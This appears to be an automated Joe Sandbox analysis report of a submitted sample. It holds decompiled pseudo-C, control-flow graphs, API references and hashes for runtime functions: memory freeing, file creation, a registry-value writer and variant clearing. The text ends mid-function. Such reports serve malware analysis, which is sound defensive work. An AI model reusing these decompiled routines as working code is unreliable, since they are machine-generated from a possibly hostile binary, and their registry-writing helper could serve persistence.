                                                                                                  • Instruction ID: d4328409d1f0da23fdcab7317c1f516a1ea75ed2b445f1edafd941bd79890c18
                                                                                                  • Opcode Fuzzy Hash: d496db75d5a48851c87e8cf58e9eadcbe6d5b423d3e4f9a177ddc599c8668f9b
                                                                                                  • Instruction Fuzzy Hash: C4B104BEA002619BDB16CF6CD488365BBE1EB85315F1886BDD84DCB3C5DB709451CB90
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 4237 2851a8c-2851a9b 4238 2851aa1-2851aa5 4237->4238 4239 2851b6c-2851b6f 4237->4239 4242 2851aa7-2851aae 4238->4242 4243 2851b08-2851b11 4238->4243 4240 2851b75-2851b7f 4239->4240 4241 2851c5c-2851c60 4239->4241 4245 2851b81-2851b8d 4240->4245 4246 2851b3c-2851b49 4240->4246 4249 2851c66-2851c6b 4241->4249 4250 28516e8-285170b call 2851644 VirtualFree 4241->4250 4247 2851ab0-2851abb 4242->4247 4248 2851adc-2851ade 4242->4248 4243->4242 4244 2851b13-2851b27 Sleep 4243->4244 4244->4242 4252 2851b2d-2851b38 Sleep 4244->4252 4254 2851bc4-2851bd2 4245->4254 4255 2851b8f-2851b92 4245->4255 4246->4245 4253 2851b4b-2851b5f Sleep 4246->4253 4256 2851ac4-2851ad9 4247->4256 4257 2851abd-2851ac2 4247->4257 4258 2851ae0-2851af1 4248->4258 4259 2851af3 4248->4259 4266 2851716 4250->4266 4267 285170d-2851714 4250->4267 4252->4243 4253->4245 4261 2851b61-2851b68 Sleep 4253->4261 4262 2851b96-2851b9a 4254->4262 4264 2851bd4-2851bd9 call 28514c0 4254->4264 4255->4262 4258->4259 4263 2851af6-2851b03 4258->4263 4259->4263 4261->4246 4268 2851bdc-2851be9 4262->4268 4269 2851b9c-2851ba2 4262->4269 4263->4240 4264->4262 4271 2851719-2851723 4266->4271 4267->4271 4268->4269 4272 2851beb-2851bf2 call 28514c0 4268->4272 4273 2851bf4-2851bfe 4269->4273 4274 2851ba4-2851bc2 call 2851500 4269->4274 4272->4269 4276 2851c00-2851c28 VirtualFree 4273->4276 4277 2851c2c-2851c59 call 2851560 4273->4277
                                                                                                  C-Code - Quality: 91%
                                                                                                  			E02851A8C(void* __eax, void* __edi) {
                                                                                                  				signed int __ebx;
                                                                                                  				void* _t50;
                                                                                                  				signed int _t51;
                                                                                                  				signed int _t52;
                                                                                                  				signed int _t54;
                                                                                                  				void _t57;
                                                                                                  				int _t58;
                                                                                                  				signed int _t65;
                                                                                                  				void* _t67;
                                                                                                  				signed int _t69;
                                                                                                  				intOrPtr _t70;
                                                                                                  				signed int _t75;
                                                                                                  				signed int _t76;
                                                                                                  				signed int _t77;
                                                                                                  				void* _t79;
                                                                                                  				void* _t82;
                                                                                                  				void _t85;
                                                                                                  				void* _t87;
                                                                                                  				void* _t89;
                                                                                                  
                                                                                                  				_t48 = __eax;
                                                                                                  				_t77 =  *(__eax - 4);
                                                                                                  				_t65 =  *0x28a304d; // 0x0
                                                                                                  				if((_t77 & 0x00000007) != 0) {
                                                                                                  					__eflags = _t77 & 0x00000005;
                                                                                                  					if((_t77 & 0x00000005) != 0) {
                                                                                                  						_pop(_t65);
                                                                                                  						__eflags = _t77 & 0x00000003;
                                                                                                  						if((_t77 & 0x00000003) != 0) {
                                                                                                  							return 0xffffffff;
                                                                                                  						} else {
                                                                                                  							_push(_t65);
                                                                                                  							_t67 = __eax - 0x10;
                                                                                                  							E02851644();
                                                                                                  							_t50 = _t67;
                                                                                                  							_t85 =  *_t50;
                                                                                                  							_t82 =  *(_t50 + 4);
                                                                                                  							_t51 = VirtualFree(_t67, 0, 0x8000); // executed
                                                                                                  							if(_t51 == 0) {
                                                                                                  								_t52 = _t51 | 0xffffffff;
                                                                                                  								__eflags = _t52;
                                                                                                  							} else {
                                                                                                  								 *_t82 = _t85;
                                                                                                  								 *(_t85 + 4) = _t82;
                                                                                                  								_t52 = 0;
                                                                                                  							}
                                                                                                  							 *0x28a57a8 = 0;
                                                                                                  							return _t52;
                                                                                                  						}
                                                                                                  					} else {
                                                                                                  						goto L21;
                                                                                                  					}
                                                                                                  				} else {
                                                                                                  					__eflags = __bl;
                                                                                                  					__ebx =  *__edx;
                                                                                                  					if(__eflags != 0) {
                                                                                                  						while(1) {
                                                                                                  							__eax = 0x100;
                                                                                                  							asm("lock cmpxchg [ebx], ah");
                                                                                                  							if(__eflags == 0) {
                                                                                                  								goto L6;
                                                                                                  							}
                                                                                                  							Sleep(0);
                                                                                                  							__edx = __edx;
                                                                                                  							__ecx = __ecx;
                                                                                                  							__eax = 0x100;
                                                                                                  							asm("lock cmpxchg [ebx], ah");
                                                                                                  							if(__eflags != 0) {
                                                                                                  								Sleep(0xa);
                                                                                                  								__edx = __edx;
                                                                                                  								__ecx = __ecx;
                                                                                                  								continue;
                                                                                                  							}
                                                                                                  							goto L6;
                                                                                                  						}
                                                                                                  					}
                                                                                                  					L6:
                                                                                                  					_t6 = __edx + 0xc;
                                                                                                  					 *_t6 =  *(__edx + 0xc) - 1;
                                                                                                  					__eflags =  *_t6;
                                                                                                  					__eax =  *(__edx + 8);
                                                                                                  					if( *_t6 == 0) {
                                                                                                  						__eflags = __eax;
                                                                                                  						if(__eax == 0) {
                                                                                                  							L12:
                                                                                                  							 *(__ebx + 0xc) = __eax;
                                                                                                  						} else {
                                                                                                  							__eax =  *(__edx + 0x14);
                                                                                                  							__ecx =  *(__edx + 4);
                                                                                                  							 *(__eax + 4) = __ecx;
                                                                                                  							 *(__ecx + 0x14) = __eax;
                                                                                                  							__eax = 0;
                                                                                                  							__eflags =  *((intOrPtr*)(__ebx + 0x10)) - __edx;
                                                                                                  							if( *((intOrPtr*)(__ebx + 0x10)) == __edx) {
                                                                                                  								goto L12;
                                                                                                  							}
                                                                                                  						}
                                                                                                  						 *__ebx = __al;
                                                                                                  						__eax = __edx;
                                                                                                  						__edx =  *(__edx - 4);
                                                                                                  						__bl =  *0x28a304d; // 0x0
                                                                                                  						L21:
                                                                                                  						__eflags = _t65;
                                                                                                  						_t69 = _t77 & 0xfffffff0;
                                                                                                  						_push(_t84);
                                                                                                  						_t87 = _t48;
                                                                                                  						if(__eflags != 0) {
                                                                                                  							while(1) {
                                                                                                  								_t54 = 0x100;
                                                                                                  								asm("lock cmpxchg [0x28a3718], ah");
                                                                                                  								if(__eflags == 0) {
                                                                                                  									goto L22;
                                                                                                  								}
                                                                                                  								Sleep(0);
                                                                                                  								_t54 = 0x100;
                                                                                                  								asm("lock cmpxchg [0x28a3718], ah");
                                                                                                  								if(__eflags != 0) {
                                                                                                  									Sleep(0xa);
                                                                                                  									continue;
                                                                                                  								}
                                                                                                  								goto L22;
                                                                                                  							}
                                                                                                  						}
                                                                                                  						L22:
                                                                                                  						__eflags = (_t87 - 4)[_t69] & 0x00000001;
                                                                                                  						_t75 = (_t87 - 4)[_t69];
                                                                                                  						if(((_t87 - 4)[_t69] & 0x00000001) != 0) {
                                                                                                  							_t54 = _t69 + _t87;
                                                                                                  							_t76 = _t75 & 0xfffffff0;
                                                                                                  							_t69 = _t69 + _t76;
                                                                                                  							__eflags = _t76 - 0xb30;
                                                                                                  							if(_t76 >= 0xb30) {
                                                                                                  								_t54 = E028514C0(_t54);
                                                                                                  							}
                                                                                                  						} else {
                                                                                                  							_t76 = _t75 | 0x00000008;
                                                                                                  							__eflags = _t76;
                                                                                                  							(_t87 - 4)[_t69] = _t76;
                                                                                                  						}
                                                                                                  						__eflags =  *(_t87 - 4) & 0x00000008;
                                                                                                  						if(( *(_t87 - 4) & 0x00000008) != 0) {
                                                                                                  							_t76 =  *(_t87 - 8);
                                                                                                  							_t87 = _t87 - _t76;
                                                                                                  							_t69 = _t69 + _t76;
                                                                                                  							__eflags = _t76 - 0xb30;
                                                                                                  							if(_t76 >= 0xb30) {
                                                                                                  								_t54 = E028514C0(_t87);
                                                                                                  							}
                                                                                                  						}
                                                                                                  						__eflags = _t69 - 0x13fff0;
                                                                                                  						if(_t69 == 0x13fff0) {
                                                                                                  							__eflags =  *0x28a3720 - 0x13fff0;
                                                                                                  							if( *0x28a3720 != 0x13fff0) {
                                                                                                  								_t70 = _t87 + 0x13fff0;
                                                                                                  								E02851560(_t54);
                                                                                                  								 *((intOrPtr*)(_t70 - 4)) = 2;
                                                                                                  								 *0x28a3720 = 0x13fff0;
                                                                                                  								 *0x28a371c = _t70;
                                                                                                  								 *0x28a3718 = 0;
                                                                                                  								__eflags = 0;
                                                                                                  								return 0;
                                                                                                  							} else {
                                                                                                  								_t89 = _t87 - 0x10;
                                                                                                  								_t57 =  *_t89;
                                                                                                  								_t79 =  *(_t89 + 4);
                                                                                                  								 *(_t57 + 4) = _t79;
                                                                                                  								 *_t79 = _t57;
                                                                                                  								 *0x28a3718 = 0;
                                                                                                  								_t58 = VirtualFree(_t89, 0, 0x8000);
                                                                                                  								__eflags = _t58 - 1;
                                                                                                  								asm("sbb eax, eax");
                                                                                                  								return _t58;
                                                                                                  							}
                                                                                                  						} else {
                                                                                                  							 *(_t87 - 4) = _t69 + 3;
                                                                                                  							 *(_t87 - 8 + _t69) = _t69;
                                                                                                  							E02851500(_t87, _t76, _t69);
                                                                                                  							 *0x28a3718 = 0;
                                                                                                  							__eflags = 0;
                                                                                                  							return 0;
                                                                                                  						}
                                                                                                  					} else {
                                                                                                  						__eflags = __eax;
                                                                                                  						 *(__edx + 8) = __ecx;
                                                                                                  						 *(__ecx - 4) = __eax;
                                                                                                  						if(__eflags == 0) {
                                                                                                  							__ecx =  *(__ebx + 4);
                                                                                                  							 *(__edx + 0x14) = __ebx;
                                                                                                  							 *(__edx + 4) = __ecx;
                                                                                                  							 *(__ecx + 0x14) = __edx;
                                                                                                  							 *(__ebx + 4) = __edx;
                                                                                                  							 *__ebx = 0;
                                                                                                  							__eax = 0;
                                                                                                  							__eflags = 0;
                                                                                                  							_pop(__ebx);
                                                                                                  							return 0;
                                                                                                  						} else {
                                                                                                  							__eax = 0;
                                                                                                  							__eflags = 0;
                                                                                                  							 *__ebx = __al;
                                                                                                  							_pop(__ebx);
                                                                                                  							return 0;
                                                                                                  						}
                                                                                                  					}
                                                                                                  				}
                                                                                                  			}






















                                                                                                  0x02851aa7
                                                                                                  0x02851aa7
                                                                                                  0x02851aa7
                                                                                                  0x02851aab
                                                                                                  0x02851aae
                                                                                                  0x02851adc
                                                                                                  0x02851ade
                                                                                                  0x02851af3
                                                                                                  0x02851af3
                                                                                                  0x02851ae0
                                                                                                  0x02851ae0
                                                                                                  0x02851ae3
                                                                                                  0x02851ae6
                                                                                                  0x02851ae9
                                                                                                  0x02851aec
                                                                                                  0x02851aee
                                                                                                  0x02851af1
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x02851af1
                                                                                                  0x02851af6
                                                                                                  0x02851af8
                                                                                                  0x02851afa
                                                                                                  0x02851afd
                                                                                                  0x02851b75
                                                                                                  0x02851b78
                                                                                                  0x02851b7a
                                                                                                  0x02851b7c
                                                                                                  0x02851b7d
                                                                                                  0x02851b7f
                                                                                                  0x02851b3c
                                                                                                  0x02851b3c
                                                                                                  0x02851b41
                                                                                                  0x02851b49
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x02851b4d
                                                                                                  0x02851b52
                                                                                                  0x02851b57
                                                                                                  0x02851b5f
                                                                                                  0x02851b63
                                                                                                  0x00000000
                                                                                                  0x02851b63
                                                                                                  0x00000000
                                                                                                  0x02851b5f
                                                                                                  0x02851b3c
                                                                                                  0x02851b81
                                                                                                  0x02851b81
                                                                                                  0x02851b89
                                                                                                  0x02851b8d
                                                                                                  0x02851bc4
                                                                                                  0x02851bc7
                                                                                                  0x02851bca
                                                                                                  0x02851bcc
                                                                                                  0x02851bd2
                                                                                                  0x02851bd4
                                                                                                  0x02851bd4
                                                                                                  0x02851b8f
                                                                                                  0x02851b8f
                                                                                                  0x02851b8f
                                                                                                  0x02851b92
                                                                                                  0x02851b92
                                                                                                  0x02851b96
                                                                                                  0x02851b9a
                                                                                                  0x02851bdc
                                                                                                  0x02851bdf
                                                                                                  0x02851be1
                                                                                                  0x02851be3
                                                                                                  0x02851be9
                                                                                                  0x02851bed
                                                                                                  0x02851bed
                                                                                                  0x02851be9
                                                                                                  0x02851b9c
                                                                                                  0x02851ba2
                                                                                                  0x02851bf4
                                                                                                  0x02851bfe
                                                                                                  0x02851c2c
                                                                                                  0x02851c32
                                                                                                  0x02851c37
                                                                                                  0x02851c3e
                                                                                                  0x02851c48
                                                                                                  0x02851c4e
                                                                                                  0x02851c55
                                                                                                  0x02851c59
                                                                                                  0x02851c00
                                                                                                  0x02851c00
                                                                                                  0x02851c03
                                                                                                  0x02851c05
                                                                                                  0x02851c08
                                                                                                  0x02851c0b
                                                                                                  0x02851c0d
                                                                                                  0x02851c1c
                                                                                                  0x02851c21
                                                                                                  0x02851c24
                                                                                                  0x02851c28
                                                                                                  0x02851c28
                                                                                                  0x02851ba4
                                                                                                  0x02851ba7
                                                                                                  0x02851baa
                                                                                                  0x02851bb2
                                                                                                  0x02851bb7
                                                                                                  0x02851bbe
                                                                                                  0x02851bc2
                                                                                                  0x02851bc2
                                                                                                  0x02851ab0
                                                                                                  0x02851ab0
                                                                                                  0x02851ab2
                                                                                                  0x02851ab8
                                                                                                  0x02851abb
                                                                                                  0x02851ac4
                                                                                                  0x02851ac7
                                                                                                  0x02851aca
                                                                                                  0x02851acd
                                                                                                  0x02851ad0
                                                                                                  0x02851ad3
                                                                                                  0x02851ad6
                                                                                                  0x02851ad6
                                                                                                  0x02851ad8
                                                                                                  0x02851ad9
                                                                                                  0x02851abd
                                                                                                  0x02851abd
                                                                                                  0x02851abd
                                                                                                  0x02851abf
                                                                                                  0x02851ac1
                                                                                                  0x02851ac2
                                                                                                  0x02851ac2
                                                                                                  0x02851abb
                                                                                                  0x02851aae

                                                                                                  APIs
                                                                                                  • Sleep.KERNEL32(00000000,?,?,00000000,02851FE4), ref: 02851B17
                                                                                                  • Sleep.KERNEL32(0000000A,00000000,?,?,00000000,02851FE4), ref: 02851B31
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.554764034.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.554751318.0000000002850000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554933392.00000000028A6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554948392.00000000028A7000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_2850000_tTIYCp2sf4.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Sleep
                                                                                                  • String ID:
                                                                                                  • API String ID: 3472027048-0
                                                                                                  • Opcode ID: c9f3114ecd215452868b3c40e91c195a8893a75692548a428a7dabbf4a7cf2ad
                                                                                                  • Instruction ID: 6e13839fd6d086a42cbd3c1d6f2180466aad9c7349b6a486189bcb1526b2a3e4
                                                                                                  • Opcode Fuzzy Hash: c9f3114ecd215452868b3c40e91c195a8893a75692548a428a7dabbf4a7cf2ad
                                                                                                  • Instruction Fuzzy Hash: BD51C47D6012609FE716CF6CC988766BBD1AB45318F1885AEDC4CCB2D2E770C945CB92
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  C-Code - Quality: 84%
                                                                                                  			E02865C24(void* __ebx, void* __ecx, char __edx, void* __edi, void* __esi, signed short _a8) {
                                                                                                  				char _v5;
                                                                                                  				char _v12;
                                                                                                  				char _v16;
                                                                                                  				char _v20;
                                                                                                  				char _v24;
                                                                                                  				char _v28;
                                                                                                  				char _v32;
                                                                                                  				char _v36;
                                                                                                  				char _v40;
                                                                                                  				void* _t29;
                                                                                                  				void* _t51;
                                                                                                  				void* _t65;
                                                                                                  				void* _t66;
                                                                                                  				intOrPtr _t70;
                                                                                                  				intOrPtr _t72;
                                                                                                  				char _t73;
                                                                                                  				intOrPtr _t77;
                                                                                                  				void* _t89;
                                                                                                  				void* _t91;
                                                                                                  				void* _t92;
                                                                                                  				intOrPtr _t93;
                                                                                                  
                                                                                                  				_t73 = __edx;
                                                                                                  				_t66 = __ecx;
                                                                                                  				_t91 = _t92;
                                                                                                  				_t93 = _t92 + 0xffffffdc;
                                                                                                  				_v36 = 0;
                                                                                                  				_v40 = 0;
                                                                                                  				_v28 = 0;
                                                                                                  				_v32 = 0;
                                                                                                  				if(__edx != 0) {
                                                                                                  					_t93 = _t93 + 0xfffffff0;
                                                                                                  					_t29 = E0285390C(_t29, _t91);
                                                                                                  				}
                                                                                                  				_t89 = _t66;
                                                                                                  				_v5 = _t73;
                                                                                                  				_t65 = _t29;
                                                                                                  				_t87 = _a8;
                                                                                                  				_push(_t91);
                                                                                                  				_push(0x2865d6c);
                                                                                                  				_push( *[fs:eax]);
                                                                                                  				 *[fs:eax] = _t93;
                                                                                                  				if(_a8 != 0xffff) {
                                                                                                  					E02865B1C(E02857D40(_t89, _t87 & 0x0000ffff), 0);
                                                                                                  					if( *((intOrPtr*)(_t65 + 4)) < 0) {
                                                                                                  						E02857F7C(_t89,  &_v36);
                                                                                                  						_v24 = _v36;
                                                                                                  						_v20 = 0xb;
                                                                                                  						E0285A75C(GetLastError(),  &_v40);
                                                                                                  						_v16 = _v40;
                                                                                                  						_v12 = 0xb;
                                                                                                  						_t70 =  *0x28a2be4; // 0x2862fd4
                                                                                                  						E0285B068(_t65, _t70, 1, _t87, _t89, 1,  &_v24);
                                                                                                  						E02853E5C();
                                                                                                  					}
                                                                                                  				} else {
                                                                                                  					_t51 = CreateFileA(E02854964(_t89), 0xc0000000, 0, 0, 2, 0x80, 0); // executed
                                                                                                  					E02865B1C(_t51, 0);
                                                                                                  					if( *((intOrPtr*)(_t65 + 4)) < 0) {
                                                                                                  						E02857F7C(_t89,  &_v28);
                                                                                                  						_v24 = _v28;
                                                                                                  						_v20 = 0xb;
                                                                                                  						E0285A75C(GetLastError(),  &_v32);
                                                                                                  						_v16 = _v32;
                                                                                                  						_v12 = 0xb;
                                                                                                  						_t72 =  *0x28a2e14; // 0x2862fcc
                                                                                                  						E0285B068(_t65, _t72, 1, _t87, _t89, 1,  &_v24);
                                                                                                  						E02853E5C();
                                                                                                  					}
                                                                                                  				}
                                                                                                  				_t27 = _t65 + 8; // 0x28638ec
                                                                                                  				E028544F4(_t27, _t89);
                                                                                                  				_pop(_t77);
                                                                                                  				 *[fs:eax] = _t77;
                                                                                                  				_push(0x2865d73);
                                                                                                  				return E028544C4( &_v40, 4);
                                                                                                  			}
























                                                                                                  0x02865cdd
                                                                                                  0x02865c94
                                                                                                  0x02865d47
                                                                                                  0x02865d4c
                                                                                                  0x02865d53
                                                                                                  0x02865d56
                                                                                                  0x02865d59
                                                                                                  0x02865d6b

                                                                                                  APIs
                                                                                                  • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02865D6C,?,?,028638E4,00000001), ref: 02865C80
                                                                                                  • GetLastError.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02865D6C,?,?,028638E4,00000001), ref: 02865CAE
                                                                                                    • Part of subcall function 02857D40: CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000,?,?,028638E4,02865CEE,00000000,02865D6C,?,?,028638E4), ref: 02857D8E
                                                                                                    • Part of subcall function 02857F7C: GetFullPathNameA.KERNEL32(00000000,00000104,?,?,?,028638E4,02865D09,00000000,02865D6C,?,?,028638E4,00000001), ref: 02857F9B
                                                                                                  • GetLastError.KERNEL32(00000000,02865D6C,?,?,028638E4,00000001), ref: 02865D13
                                                                                                    • Part of subcall function 0285A75C: FormatMessageA.KERNEL32(00003200,00000000,?,00000000,?,00000100,00000000,?,0285C3BD,00000000,0285C417), ref: 0285A77B
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.554764034.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.554751318.0000000002850000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554933392.00000000028A6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554948392.00000000028A7000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_2850000_tTIYCp2sf4.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateErrorFileLast$FormatFullMessageNamePath
                                                                                                  • String ID:
                                                                                                  • API String ID: 503785936-0
                                                                                                  • Opcode ID: 89e6adb25df23c9ab4e20b40ddae3b3edeba4acce340a42e85f65de9437578d8
                                                                                                  • Instruction ID: 87689ddc2874f374eebcc11e9c88e30772d17c26485d8406e6625208c15e6991
                                                                                                  • Opcode Fuzzy Hash: 89e6adb25df23c9ab4e20b40ddae3b3edeba4acce340a42e85f65de9437578d8
                                                                                                  • Instruction Fuzzy Hash: 0731447CA006149BDB10DFACC8847ADB7F6AB48704F908465E904E7381D77959058FA6
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  C-Code - Quality: 76%
                                                                                                  			E0286C678(void* __eax, void* __ebx, char __ecx, intOrPtr __edx, int _a4) {
                                                                                                  				intOrPtr _v8;
                                                                                                  				char _v12;
                                                                                                  				int _t23;
                                                                                                  				int _t24;
                                                                                                  				char* _t26;
                                                                                                  				char* _t28;
                                                                                                  				void* _t29;
                                                                                                  				void* _t31;
                                                                                                  				void* _t40;
                                                                                                  				intOrPtr _t45;
                                                                                                  				void* _t49;
                                                                                                  
                                                                                                  				_v12 = __ecx;
                                                                                                  				_v8 = __edx;
                                                                                                  				_t40 = __eax;
                                                                                                  				E02854954(_v8);
                                                                                                  				E02854954(_v12);
                                                                                                  				E02854954(_a4);
                                                                                                  				_push(_t49);
                                                                                                  				_push(0x286c727);
                                                                                                  				_push( *[fs:eax]);
                                                                                                  				 *[fs:eax] = _t49 + 0xfffffff8;
                                                                                                  				RegOpenKeyA(_t40, E02854964(_v8), 0x28a6644); // executed
                                                                                                  				_t23 = _a4;
                                                                                                  				if(_t23 != 0) {
                                                                                                  					_t23 =  *(_t23 - 4);
                                                                                                  				}
                                                                                                  				 *0x28a6648 = _t23;
                                                                                                  				_t24 =  *0x28a6648; // 0x1c
                                                                                                  				_t26 = E028549BC( &_a4);
                                                                                                  				_t28 = E02854964(_v12);
                                                                                                  				_t29 =  *0x28a6644; // 0x8a0
                                                                                                  				RegSetValueExA(_t29, _t28, 0, 1, _t26, _t24);
                                                                                                  				_t31 =  *0x28a6644; // 0x8a0
                                                                                                  				RegCloseKey(_t31);
                                                                                                  				_pop(_t45);
                                                                                                  				 *[fs:eax] = _t45;
                                                                                                  				_push(0x286c72e);
                                                                                                  				E028544C4( &_v12, 2);
                                                                                                  				return E028544A0( &_a4);
                                                                                                  			}















                                                                                                  APIs
                                                                                                  • RegOpenKeyA.ADVAPI32(?,00000000,028A6644), ref: 0286C6BC
                                                                                                  • RegSetValueExA.ADVAPI32(000008A0,00000000,00000000,00000001,00000000,0000001C,00000000,0286C727), ref: 0286C6F4
                                                                                                  • RegCloseKey.ADVAPI32(000008A0,000008A0,00000000,00000000,00000001,00000000,0000001C,00000000,0286C727), ref: 0286C6FF
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.554764034.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.554751318.0000000002850000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554933392.00000000028A6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554948392.00000000028A7000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_2850000_tTIYCp2sf4.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CloseOpenValue
                                                                                                  • String ID:
                                                                                                  • API String ID: 779948276-0
                                                                                                  • Opcode ID: f6ef7576d91f7e26974a4690f02293ca6c9d7d7fc4dcfae9ae32d68bb0638f1f
                                                                                                  • Instruction ID: db5c6b296194e25c3b016d95575915de000c121ffd1f9ad3813e0b7dae65a790
                                                                                                  • Opcode Fuzzy Hash: f6ef7576d91f7e26974a4690f02293ca6c9d7d7fc4dcfae9ae32d68bb0638f1f
                                                                                                  • Instruction Fuzzy Hash: 40110DBC640224AFEB00EF6CC986AAD77EDEF08301F544465F915D72A1EB34E940DA55
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  C-Code - Quality: 79%
                                                                                                  			E0285E348(signed short* __eax, void* __ecx) {
                                                                                                  				void* _t7;
                                                                                                  				signed short _t18;
                                                                                                  				intOrPtr* _t19;
                                                                                                  
                                                                                                  				_t12 = __eax;
                                                                                                  				_t18 =  *__eax & 0x0000ffff;
                                                                                                  				if(_t18 >= 0x14) {
                                                                                                  					if(_t18 != 0x100) {
                                                                                                  						if(_t18 != 0x101) {
                                                                                                  							if((_t18 & 0x00002000) == 0) {
                                                                                                  								_t7 = E02862E88(_t18, _t19);
                                                                                                  								if(_t7 == 0) {
                                                                                                  									L0285CDCC();
                                                                                                  									L0285CDC4();
                                                                                                  								} else {
                                                                                                  									_t7 =  *((intOrPtr*)( *((intOrPtr*)( *_t19)) + 0x24))();
                                                                                                  								}
                                                                                                  							} else {
                                                                                                  								_t7 = E0285E1CC(__eax);
                                                                                                  							}
                                                                                                  						} else {
                                                                                                  							_t7 =  *0x28a629c();
                                                                                                  						}
                                                                                                  					} else {
                                                                                                  						 *__eax = 0;
                                                                                                  						_t7 = E028544A0( &(__eax[4]));
                                                                                                  					}
                                                                                                  				} else {
                                                                                                  					_push(__eax); // executed
                                                                                                  					L0285CDCC(); // executed
                                                                                                  					_t7 = E0285E014(__eax);
                                                                                                  				}
                                                                                                  				return _t7;
                                                                                                  			}







                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.554764034.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.554751318.0000000002850000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554933392.00000000028A6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554948392.00000000028A7000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_2850000_tTIYCp2sf4.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ClearVariant
                                                                                                  • String ID:
                                                                                                  • API String ID: 1473721057-0
                                                                                                  • Opcode ID: 0744df7b6655635a0e8627c3c1622c81a062f9ba3761e29f1dd90c11f83ca045
                                                                                                  • Instruction ID: 3255acf3fa8f58da7a8ab272a564ee63f4221d2b850323e82952e39b149c89e4
                                                                                                  • Opcode Fuzzy Hash: 0744df7b6655635a0e8627c3c1622c81a062f9ba3761e29f1dd90c11f83ca045
                                                                                                  • Instruction Fuzzy Hash: 21F0C22D70423486C7107B3CCD846E93B9E9F40398748A426EC4BDB295CB348E05CB63
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  C-Code - Quality: 56%
                                                                                                  			E02854D14(signed int __eax, void* __ecx, void* __edx) {
                                                                                                  				void* _t4;
                                                                                                  				signed int _t13;
                                                                                                  				void* _t16;
                                                                                                  				void* _t17;
                                                                                                  				void* _t21;
                                                                                                  
                                                                                                  				_t16 = __edx;
                                                                                                  				_t3 = __eax;
                                                                                                  				if(__ecx == 0) {
                                                                                                  					_t17 =  *__eax;
                                                                                                  					if(_t17 != 0) {
                                                                                                  						 *__eax = 0;
                                                                                                  						_push(__eax);
                                                                                                  						L02851260();
                                                                                                  						_t4 = _t17;
                                                                                                  						return _t4;
                                                                                                  					}
                                                                                                  					return __eax;
                                                                                                  				} else {
                                                                                                  					_push(__eax);
                                                                                                  					_push(__ecx);
                                                                                                  					_push(__edx); // executed
                                                                                                  					L02851250(); // executed
                                                                                                  					if(__eax == 0) {
                                                                                                  						__eax = __eax & 0x0000007f;
                                                                                                  						__edx =  *__esp;
                                                                                                  						_t21 = _t16;
                                                                                                  						_t13 = _t3 & 0x0000007f;
                                                                                                  						if( *0x28a3008 != 0) {
                                                                                                  							 *0x28a3008();
                                                                                                  						}
                                                                                                  						if(_t13 != 0) {
                                                                                                  							if(_t13 <= 0x18) {
                                                                                                  								_t2 = (_t13 & 0x000000ff) + 0x2877738; // 0xd7c9c8cc
                                                                                                  								_t13 =  *_t2 & 0x000000ff;
                                                                                                  							}
                                                                                                  						} else {
                                                                                                  							_t13 =  *(E028564E4() + 4);
                                                                                                  						}
                                                                                                  						return E02852CE8(_t21);
                                                                                                  					} else {
                                                                                                  						_pop(__edx);
